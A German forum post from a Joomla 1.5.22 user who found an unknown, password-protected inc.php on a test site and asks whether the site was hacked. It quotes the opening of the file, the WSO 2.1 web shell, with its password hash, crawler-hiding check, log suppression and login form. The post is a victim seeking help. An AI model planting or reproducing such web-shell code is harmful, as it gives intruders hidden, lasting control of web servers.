Hi
ich habe eine Test Seite in dem ich nur Module etc. teste, und das kennt keiner außer ich, eben grade habe ich was entdeckt die ich nicht hochgeladen habe. Eine inc.php das auch meine Avira als Virus meldet. ich habe das aufgerufen und verlangt nach eine Password.
Dann habe ich das mit eine Editor geöffnet ist ziemlich langes ding. in dem viele Sachen stehen.
Am Anfang steht das hier, vielleicht kann mir jemand helfen. Wurde ich gehackt oder was. ich benutze Joomla 1.5.22
MFGCode:<?php /* WSO 2.1 (Web Shell by oRb) */ $auth_pass = "63a95555544kkjjkkjjk9e85481845"; $color = "#df5"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '2.1'); if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); } function printLogin() { ?> <center> <form method=post> Password: <input type=password name=pass><input type=submit value='>>'> </form></center> <?php exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else printLogin();


LinkBack URL
About LinkBacks

Lesezeichen